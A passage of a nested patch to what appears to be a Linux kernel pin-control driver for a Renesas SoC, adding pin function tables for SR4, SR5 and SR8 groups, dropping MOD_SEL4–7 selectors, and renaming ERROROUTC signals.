+-#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR8_3_0	FM(SCL0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_7_4	FM(SDA0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_11_8	FM(SCL1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_15_12	FM(SDA1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_19_16	FM(SCL2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_23_20	FM(SDA2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_27_24	FM(SCL3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR8_31_28	FM(SDA3)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR8 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR8_3_0	FM(SCL4)		FM(HRX2)		FM(SCK4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_7_4	FM(SDA4)		FM(HTX2)		FM(CTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_11_8	FM(SCL5)		FM(HRTS2_N)		FM(RTS4_N)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_15_12	FM(SDA5)		FM(SCIF_CLK2)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_19_16	F_(0, 0)		FM(HCTS2_N)		FM(TX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR8_23_20	F_(0, 0)		FM(HSCK2)		FM(RX4)			F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ #define PINMUX_GPSR	\
+ 						GPSR3_29											\
+@@ -542,6 +604,24 @@ FM(IP0SR3_23_20)	IP0SR3_23_20	FM(IP1SR3_23_20)	IP1SR3_23_20	FM(IP2SR3_23_20)	IP2
+ FM(IP0SR3_27_24)	IP0SR3_27_24	FM(IP1SR3_27_24)	IP1SR3_27_24	FM(IP2SR3_27_24)	IP2SR3_27_24						\
+ FM(IP0SR3_31_28)	IP0SR3_31_28	FM(IP1SR3_31_28)	IP1SR3_31_28	FM(IP2SR3_31_28)	IP2SR3_31_28						\
+ \
++FM(IP0SR4_3_0)		IP0SR4_3_0	FM(IP1SR4_3_0)		IP1SR4_3_0	FM(IP2SR4_3_0)		IP2SR4_3_0	FM(IP3SR4_3_0)		IP3SR4_3_0	\
++FM(IP0SR4_7_4)		IP0SR4_7_4	FM(IP1SR4_7_4)		IP1SR4_7_4	FM(IP2SR4_7_4)		IP2SR4_7_4	\
++FM(IP0SR4_11_8)		IP0SR4_11_8	FM(IP1SR4_11_8)		IP1SR4_11_8	FM(IP2SR4_11_8)		IP2SR4_11_8	\
++FM(IP0SR4_15_12)	IP0SR4_15_12	FM(IP1SR4_15_12)	IP1SR4_15_12	FM(IP2SR4_15_12)	IP2SR4_15_12	\
++FM(IP0SR4_19_16)	IP0SR4_19_16	FM(IP1SR4_19_16)	IP1SR4_19_16	FM(IP2SR4_19_16)	IP2SR4_19_16	\
++FM(IP0SR4_23_20)	IP0SR4_23_20	FM(IP1SR4_23_20)	IP1SR4_23_20	FM(IP2SR4_23_20)	IP2SR4_23_20	\
++FM(IP0SR4_27_24)	IP0SR4_27_24	FM(IP1SR4_27_24)	IP1SR4_27_24	FM(IP2SR4_27_24)	IP2SR4_27_24	\
++FM(IP0SR4_31_28)	IP0SR4_31_28	FM(IP1SR4_31_28)	IP1SR4_31_28	FM(IP2SR4_31_28)	IP2SR4_31_28	\
++\
++FM(IP0SR5_3_0)		IP0SR5_3_0	FM(IP1SR5_3_0)		IP1SR5_3_0	FM(IP2SR5_3_0)		IP2SR5_3_0	\
++FM(IP0SR5_7_4)		IP0SR5_7_4	FM(IP1SR5_7_4)		IP1SR5_7_4	FM(IP2SR5_7_4)		IP2SR5_7_4	\
++FM(IP0SR5_11_8)		IP0SR5_11_8	FM(IP1SR5_11_8)		IP1SR5_11_8	FM(IP2SR5_11_8)		IP2SR5_11_8	\
++FM(IP0SR5_15_12)	IP0SR5_15_12	FM(IP1SR5_15_12)	IP1SR5_15_12	FM(IP2SR5_15_12)	IP2SR5_15_12	\
++FM(IP0SR5_19_16)	IP0SR5_19_16	FM(IP1SR5_19_16)	IP1SR5_19_16	FM(IP2SR5_19_16)	IP2SR5_19_16	\
++FM(IP0SR5_23_20)	IP0SR5_23_20	FM(IP1SR5_23_20)	IP1SR5_23_20	\
++FM(IP0SR5_27_24)	IP0SR5_27_24	FM(IP1SR5_27_24)	IP1SR5_27_24	\
++FM(IP0SR5_31_28)	IP0SR5_31_28	FM(IP1SR5_31_28)	IP1SR5_31_28	\
++\
+ FM(IP0SR6_3_0)		IP0SR6_3_0	FM(IP1SR6_3_0)		IP1SR6_3_0	FM(IP2SR6_3_0)		IP2SR6_3_0	\
+ FM(IP0SR6_7_4)		IP0SR6_7_4	FM(IP1SR6_7_4)		IP1SR6_7_4	FM(IP2SR6_7_4)		IP2SR6_7_4	\
+ FM(IP0SR6_11_8)		IP0SR6_11_8	FM(IP1SR6_11_8)		IP1SR6_11_8	FM(IP2SR6_11_8)		IP2SR6_11_8	\
+@@ -569,54 +649,6 @@ FM(IP0SR8_23_20)	IP0SR8_23_20	FM(IP1SR8_23_20)	IP1SR8_23_20	\
+ FM(IP0SR8_27_24)	IP0SR8_27_24	\
+ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+-/* MOD_SEL4 */			/* 0 */				/* 1 */
+-#define MOD_SEL4_19		FM(SEL_TSN0_TD2_0)		FM(SEL_TSN0_TD2_1)
+-#define MOD_SEL4_18		FM(SEL_TSN0_TD3_0)		FM(SEL_TSN0_TD3_1)
+-#define MOD_SEL4_15		FM(SEL_TSN0_TD0_0)		FM(SEL_TSN0_TD0_1)
+-#define MOD_SEL4_14		FM(SEL_TSN0_TD1_0)		FM(SEL_TSN0_TD1_1)
+-#define MOD_SEL4_12		FM(SEL_TSN0_TXC_0)		FM(SEL_TSN0_TXC_1)
+-#define MOD_SEL4_9		FM(SEL_TSN0_TX_CTL_0)		FM(SEL_TSN0_TX_CTL_1)
+-#define MOD_SEL4_8		FM(SEL_TSN0_AVTP_PPS0_0)	FM(SEL_TSN0_AVTP_PPS0_1)
+-#define MOD_SEL4_5		FM(SEL_TSN0_AVTP_MATCH_0)	FM(SEL_TSN0_AVTP_MATCH_1)
+-#define MOD_SEL4_2		FM(SEL_TSN0_AVTP_PPS1_0)	FM(SEL_TSN0_AVTP_PPS1_1)
+-#define MOD_SEL4_1		FM(SEL_TSN0_MDC_0)		FM(SEL_TSN0_MDC_1)
+-
+-/* MOD_SEL5 */			/* 0 */				/* 1 */
+-#define MOD_SEL5_19		FM(SEL_AVB2_TX_CTL_0)		FM(SEL_AVB2_TX_CTL_1)
+-#define MOD_SEL5_16		FM(SEL_AVB2_TXC_0)		FM(SEL_AVB2_TXC_1)
+-#define MOD_SEL5_15		FM(SEL_AVB2_TD0_0)		FM(SEL_AVB2_TD0_1)
+-#define MOD_SEL5_12		FM(SEL_AVB2_TD1_0)		FM(SEL_AVB2_TD1_1)
+-#define MOD_SEL5_11		FM(SEL_AVB2_TD2_0)		FM(SEL_AVB2_TD2_1)
+-#define MOD_SEL5_8		FM(SEL_AVB2_TD3_0)		FM(SEL_AVB2_TD3_1)
+-#define MOD_SEL5_6		FM(SEL_AVB2_MDC_0)		FM(SEL_AVB2_MDC_1)
+-#define MOD_SEL5_5		FM(SEL_AVB2_MAGIC_0)		FM(SEL_AVB2_MAGIC_1)
+-#define MOD_SEL5_2		FM(SEL_AVB2_AVTP_MATCH_0)	FM(SEL_AVB2_AVTP_MATCH_1)
+-#define MOD_SEL5_0		FM(SEL_AVB2_AVTP_PPS_0)		FM(SEL_AVB2_AVTP_PPS_1)
+-
+-/* MOD_SEL6 */			/* 0 */				/* 1 */
+-#define MOD_SEL6_18		FM(SEL_AVB1_TD3_0)		FM(SEL_AVB1_TD3_1)
+-#define MOD_SEL6_16		FM(SEL_AVB1_TD2_0)		FM(SEL_AVB1_TD2_1)
+-#define MOD_SEL6_13		FM(SEL_AVB1_TD0_0)		FM(SEL_AVB1_TD0_1)
+-#define MOD_SEL6_12		FM(SEL_AVB1_TD1_0)		FM(SEL_AVB1_TD1_1)
+-#define MOD_SEL6_10		FM(SEL_AVB1_AVTP_PPS_0)		FM(SEL_AVB1_AVTP_PPS_1)
+-#define MOD_SEL6_7		FM(SEL_AVB1_TX_CTL_0)		FM(SEL_AVB1_TX_CTL_1)
+-#define MOD_SEL6_6		FM(SEL_AVB1_TXC_0)		FM(SEL_AVB1_TXC_1)
+-#define MOD_SEL6_5		FM(SEL_AVB1_AVTP_MATCH_0)	FM(SEL_AVB1_AVTP_MATCH_1)
+-#define MOD_SEL6_2		FM(SEL_AVB1_MDC_0)		FM(SEL_AVB1_MDC_1)
+-#define MOD_SEL6_1		FM(SEL_AVB1_MAGIC_0)		FM(SEL_AVB1_MAGIC_1)
+-
+-/* MOD_SEL7 */			/* 0 */				/* 1 */
+-#define MOD_SEL7_16		FM(SEL_AVB0_TX_CTL_0)		FM(SEL_AVB0_TX_CTL_1)
+-#define MOD_SEL7_15		FM(SEL_AVB0_TXC_0)		FM(SEL_AVB0_TXC_1)
+-#define MOD_SEL7_13		FM(SEL_AVB0_MDC_0)		FM(SEL_AVB0_MDC_1)
+-#define MOD_SEL7_11		FM(SEL_AVB0_TD0_0)		FM(SEL_AVB0_TD0_1)
+-#define MOD_SEL7_10		FM(SEL_AVB0_MAGIC_0)		FM(SEL_AVB0_MAGIC_1)
+-#define MOD_SEL7_7		FM(SEL_AVB0_TD1_0)		FM(SEL_AVB0_TD1_1)
+-#define MOD_SEL7_6		FM(SEL_AVB0_TD2_0)		FM(SEL_AVB0_TD2_1)
+-#define MOD_SEL7_3		FM(SEL_AVB0_TD3_0)		FM(SEL_AVB0_TD3_1)
+-#define MOD_SEL7_2		FM(SEL_AVB0_AVTP_MATCH_0)	FM(SEL_AVB0_AVTP_MATCH_1)
+-#define MOD_SEL7_0		FM(SEL_AVB0_AVTP_PPS_0)		FM(SEL_AVB0_AVTP_PPS_1)
+-
+ /* MOD_SEL8 */			/* 0 */				/* 1 */
+ #define MOD_SEL8_11		FM(SEL_SDA5_0)			FM(SEL_SDA5_1)
+ #define MOD_SEL8_10		FM(SEL_SCL5_0)			FM(SEL_SCL5_1)
+@@ -633,26 +665,18 @@ FM(IP0SR8_31_28)	IP0SR8_31_28
+ 
+ #define PINMUX_MOD_SELS \
+ \
+-MOD_SEL4_19		MOD_SEL5_19										\
+-MOD_SEL4_18					MOD_SEL6_18							\
+-														\
+-			MOD_SEL5_16		MOD_SEL6_16		MOD_SEL7_16				\
+-MOD_SEL4_15		MOD_SEL5_15					MOD_SEL7_15				\
+-MOD_SEL4_14													\
+-						MOD_SEL6_13		MOD_SEL7_13				\
+-MOD_SEL4_12		MOD_SEL5_12		MOD_SEL6_12							\
+-			MOD_SEL5_11					MOD_SEL7_11		MOD_SEL8_11	\
+-						MOD_SEL6_10		MOD_SEL7_10		MOD_SEL8_10	\
+-MOD_SEL4_9											MOD_SEL8_9	\
+-MOD_SEL4_8		MOD_SEL5_8								MOD_SEL8_8	\
+-						MOD_SEL6_7		MOD_SEL7_7		MOD_SEL8_7	\
+-			MOD_SEL5_6		MOD_SEL6_6		MOD_SEL7_6		MOD_SEL8_6	\
+-MOD_SEL4_5		MOD_SEL5_5		MOD_SEL6_5					MOD_SEL8_5	\
+-												MOD_SEL8_4	\
+-									MOD_SEL7_3		MOD_SEL8_3	\
+-MOD_SEL4_2		MOD_SEL5_2		MOD_SEL6_2		MOD_SEL7_2		MOD_SEL8_2	\
+-MOD_SEL4_1					MOD_SEL6_1					MOD_SEL8_1	\
+-			MOD_SEL5_0					MOD_SEL7_0		MOD_SEL8_0
++MOD_SEL8_11	\
++MOD_SEL8_10	\
++MOD_SEL8_9	\
++MOD_SEL8_8	\
++MOD_SEL8_7	\
++MOD_SEL8_6	\
++MOD_SEL8_5	\
++MOD_SEL8_4	\
++MOD_SEL8_3	\
++MOD_SEL8_2	\
++MOD_SEL8_1	\
++MOD_SEL8_0
+ 
+ enum {
+ 	PINMUX_RESERVED = 0,
+@@ -686,61 +710,8 @@ enum {
+ static const u16 pinmux_data[] = {
+ 	PINMUX_DATA_GP_ALL(),
+ 
+-	PINMUX_SINGLE(AVS1),
+-	PINMUX_SINGLE(AVS0),
+-	PINMUX_SINGLE(PCIE1_CLKREQ_N),
+-	PINMUX_SINGLE(PCIE0_CLKREQ_N),
+-
+-	/* TSN0 without MODSEL4 */
+-	PINMUX_SINGLE(TSN0_TXCREFCLK),
+-	PINMUX_SINGLE(TSN0_RD2),
+-	PINMUX_SINGLE(TSN0_RD3),
+-	PINMUX_SINGLE(TSN0_RD1),
+-	PINMUX_SINGLE(TSN0_RXC),
+-	PINMUX_SINGLE(TSN0_RD0),
+-	PINMUX_SINGLE(TSN0_RX_CTL),
+-	PINMUX_SINGLE(TSN0_AVTP_CAPTURE),
+-	PINMUX_SINGLE(TSN0_LINK),
+-	PINMUX_SINGLE(TSN0_PHY_INT),
+-	PINMUX_SINGLE(TSN0_MDIO),
+-	/* TSN0 with MODSEL4 */
+-	PINMUX_IPSR_NOGM(0, TSN0_TD2,		SEL_TSN0_TD2_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD3,		SEL_TSN0_TD3_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD0,		SEL_TSN0_TD0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TD1,		SEL_TSN0_TD1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TXC,		SEL_TSN0_TXC_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_TX_CTL,	SEL_TSN0_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS0,	SEL_TSN0_AVTP_PPS0_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_MATCH,	SEL_TSN0_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_AVTP_PPS1,	SEL_TSN0_AVTP_PPS1_1),
+-	PINMUX_IPSR_NOGM(0, TSN0_MDC,		SEL_TSN0_MDC_1),
+-
+-	/* TSN0 without MODSEL5 */
+-	PINMUX_SINGLE(AVB2_RX_CTL),
+-	PINMUX_SINGLE(AVB2_RXC),
+-	PINMUX_SINGLE(AVB2_RD0),
+-	PINMUX_SINGLE(AVB2_RD1),
+-	PINMUX_SINGLE(AVB2_RD2),
+-	PINMUX_SINGLE(AVB2_MDIO),
+-	PINMUX_SINGLE(AVB2_RD3),
+-	PINMUX_SINGLE(AVB2_TXCREFCLK),
+-	PINMUX_SINGLE(AVB2_PHY_INT),
+-	PINMUX_SINGLE(AVB2_LINK),
+-	PINMUX_SINGLE(AVB2_AVTP_CAPTURE),
+-	/* TSN0 with MODSEL5 */
+-	PINMUX_IPSR_NOGM(0, AVB2_TX_CTL,	SEL_AVB2_TX_CTL_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TXC,		SEL_AVB2_TXC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD0,		SEL_AVB2_TD0_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD1,		SEL_AVB2_TD1_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD2,		SEL_AVB2_TD2_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_TD3,		SEL_AVB2_TD3_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MDC,		SEL_AVB2_MDC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_MAGIC,		SEL_AVB2_MAGIC_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_MATCH,	SEL_AVB2_AVTP_MATCH_1),
+-	PINMUX_IPSR_NOGM(0, AVB2_AVTP_PPS,	SEL_AVB2_AVTP_PPS_1),
+-
+ 	/* IP0SR0 */
+-	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_B),
++	PINMUX_IPSR_GPSR(IP0SR0_3_0,	ERROROUTC_N_B),
+ 	PINMUX_IPSR_GPSR(IP0SR0_3_0,	TCLK2_A),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR0_7_4,	MSIOF3_SS1),
+@@ -1006,7 +977,7 @@ static const u16 pinmux_data[] = {
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKOUT),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	IPC_CLKEN_OUT),
+-	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_A),
++	PINMUX_IPSR_GPSR(IP1SR3_27_24,	ERROROUTC_N_A),
+ 	PINMUX_IPSR_GPSR(IP1SR3_27_24,	TCLK4_X),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR3_31_28,	QSPI0_SSL),
+@@ -1029,26 +1000,86 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP3SR3_19_16,	RPC_WP_N),
+ 	PINMUX_IPSR_GPSR(IP3SR3_23_20,	RPC_INT_N),
+ 
++	/* IP0SR4 */
++	PINMUX_IPSR_GPSR(IP0SR4_3_0,	TSN0_MDIO),
++	PINMUX_IPSR_GPSR(IP0SR4_7_4,	TSN0_MDC),
++	PINMUX_IPSR_GPSR(IP0SR4_11_8,	TSN0_AVTP_PPS1),
++	PINMUX_IPSR_GPSR(IP0SR4_15_12,	TSN0_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR4_19_16,	TSN0_LINK),
++	PINMUX_IPSR_GPSR(IP0SR4_23_20,	TSN0_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR4_27_24,	TSN0_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR4_31_28,	TSN0_RX_CTL),
++
++	/* IP1SR4 */
++	PINMUX_IPSR_GPSR(IP1SR4_3_0,	TSN0_AVTP_PPS0),
++	PINMUX_IPSR_GPSR(IP1SR4_7_4,	TSN0_TX_CTL),
++	PINMUX_IPSR_GPSR(IP1SR4_11_8,	TSN0_RD0),
++	PINMUX_IPSR_GPSR(IP1SR4_15_12,	TSN0_RXC),
++	PINMUX_IPSR_GPSR(IP1SR4_19_16,	TSN0_TXC),
++	PINMUX_IPSR_GPSR(IP1SR4_23_20,	TSN0_RD1),
++	PINMUX_IPSR_GPSR(IP1SR4_27_24,	TSN0_TD1),
++	PINMUX_IPSR_GPSR(IP1SR4_31_28,	TSN0_TD0),
++
++	/* IP2SR4 */
++	PINMUX_IPSR_GPSR(IP2SR4_3_0,	TSN0_RD3),
++	PINMUX_IPSR_GPSR(IP2SR4_7_4,	TSN0_RD2),
++	PINMUX_IPSR_GPSR(IP2SR4_11_8,	TSN0_TD3),
++	PINMUX_IPSR_GPSR(IP2SR4_15_12,	TSN0_TD2),
++	PINMUX_IPSR_GPSR(IP2SR4_19_16,	TSN0_TXCREFCLK),
++	PINMUX_IPSR_GPSR(IP2SR4_23_20,	PCIE0_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_27_24,	PCIE1_CLKREQ_N),
++	PINMUX_IPSR_GPSR(IP2SR4_31_28,	AVS0),
++
++	/* IP3SR4 */
++	PINMUX_IPSR_GPSR(IP3SR4_3_0,	AVS1),
++
++	/* IP0SR5 */
++	PINMUX_IPSR_GPSR(IP0SR5_3_0,	AVB2_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP0SR5_7_4,	AVB2_AVTP_CAPTURE),
++	PINMUX_IPSR_GPSR(IP0SR5_11_8,	AVB2_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR5_15_12,	AVB2_LINK),
++	PINMUX_IPSR_GPSR(IP0SR5_19_16,	AVB2_PHY_INT),
++	PINMUX_IPSR_GPSR(IP0SR5_23_20,	AVB2_MAGIC),
++	PINMUX_IPSR_GPSR(IP0SR5_27_24,	AVB2_MDC),
++	PINMUX_IPSR_GPSR(IP0SR5_31_28,	AVB2_TXCREFCLK),
++
++	/* IP1SR5 */
++	PINMUX_IPSR_GPSR(IP1SR5_3_0,	AVB2_TD3),
++	PINMUX_IPSR_GPSR(IP1SR5_7_4,	AVB2_RD3),
++	PINMUX_IPSR_GPSR(IP1SR5_11_8,	AVB2_MDIO),
++	PINMUX_IPSR_GPSR(IP1SR5_15_12,	AVB2_TD2),
++	PINMUX_IPSR_GPSR(IP1SR5_19_16,	AVB2_TD1),
++	PINMUX_IPSR_GPSR(IP1SR5_23_20,	AVB2_RD2),
++	PINMUX_IPSR_GPSR(IP1SR5_27_24,	AVB2_RD1),
++	PINMUX_IPSR_GPSR(IP1SR5_31_28,	AVB2_TD0),
++
++	/* IP2SR5 */
++	PINMUX_IPSR_GPSR(IP2SR5_3_0,	AVB2_TXC),
++	PINMUX_IPSR_GPSR(IP2SR5_7_4,	AVB2_RD0),
++	PINMUX_IPSR_GPSR(IP2SR5_11_8,	AVB2_RXC),
++	PINMUX_IPSR_GPSR(IP2SR5_15_12,	AVB2_TX_CTL),
++	PINMUX_IPSR_GPSR(IP2SR5_19_16,	AVB2_RX_CTL),
++
+ 	/* IP0SR6 */
+ 	PINMUX_IPSR_GPSR(IP0SR6_3_0,	AVB1_MDIO),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_7_4,	AVB1_MAGIC,		SEL_AVB1_MAGIC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_7_4,	AVB1_MAGIC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_11_8,	AVB1_MDC,		SEL_AVB1_MDC_1),
++	PINMUX_IPSR_GPSR(IP0SR6_11_8,	AVB1_MDC),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_15_12,	AVB1_PHY_INT),
+ 
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_LINK),
+ 	PINMUX_IPSR_GPSR(IP0SR6_19_16,	AVB1_MII_TX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_AVTP_MATCH,	SEL_AVB1_AVTP_MATCH_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_23_20,	AVB1_MII_RX_ER,		SEL_AVB1_AVTP_MATCH_0),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_AVTP_MATCH),
++	PINMUX_IPSR_GPSR(IP0SR6_23_20,	AVB1_MII_RX_ER),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_TXC,		SEL_AVB1_TXC_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_27_24,	AVB1_MII_TXC,		SEL_AVB1_TXC_0),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_TXC),
++	PINMUX_IPSR_GPSR(IP0SR6_27_24,	AVB1_MII_TXC),
+ 
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_TX_CTL,		SEL_AVB1_TX_CTL_1),
+-	PINMUX_IPSR_MSEL(IP0SR6_31_28,	AVB1_MII_TX_EN,		SEL_AVB1_TX_CTL_0),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_TX_CTL),
++	PINMUX_IPSR_GPSR(IP0SR6_31_28,	AVB1_MII_TX_EN),
+ 
+ 	/* IP1SR6 */
+ 	PINMUX_IPSR_GPSR(IP1SR6_3_0,	AVB1_RXC),
+@@ -1057,17 +1088,17 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_RX_CTL),
+ 	PINMUX_IPSR_GPSR(IP1SR6_7_4,	AVB1_MII_RX_DV),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_AVTP_PPS,		SEL_AVB1_AVTP_PPS_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_11_8,	AVB1_MII_COL,		SEL_AVB1_AVTP_PPS_0),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_AVTP_PPS),
++	PINMUX_IPSR_GPSR(IP1SR6_11_8,	AVB1_MII_COL),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_AVTP_CAPTURE),
+ 	PINMUX_IPSR_GPSR(IP1SR6_15_12,	AVB1_MII_CRS),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_TD1,		SEL_AVB1_TD1_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_19_16,	AVB1_MII_TD1,		SEL_AVB1_TD1_0),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_TD1),
++	PINMUX_IPSR_GPSR(IP1SR6_19_16,	AVB1_MII_TD1),
+ 
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_TD0,		SEL_AVB1_TD0_1),
+-	PINMUX_IPSR_MSEL(IP1SR6_23_20,	AVB1_MII_TD0,		SEL_AVB1_TD0_0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_TD0),
++	PINMUX_IPSR_GPSR(IP1SR6_23_20,	AVB1_MII_TD0),
+ 
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_RD1),
+ 	PINMUX_IPSR_GPSR(IP1SR6_27_24,	AVB1_MII_RD1),
+@@ -1076,14 +1107,14 @@ static const u16 pinmux_data[] = {
+ 	PINMUX_IPSR_GPSR(IP1SR6_31_28,	AVB1_MII_RD0),
+ 
+ 	/* IP2SR6 */
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_TD2,		SEL_AVB1_TD2_1),
+-	PINMUX_IPSR_MSEL(IP2SR6_3_0,	AVB1_MII_TD2,		SEL_AVB1_TD2_0),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_TD2),
++	PINMUX_IPSR_GPSR(IP2SR6_3_0,	AVB1_MII_TD2),
+ 
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_RD2),
+ 	PINMUX_IPSR_GPSR(IP2SR6_7_4,	AVB1_MII_RD2),
+ 
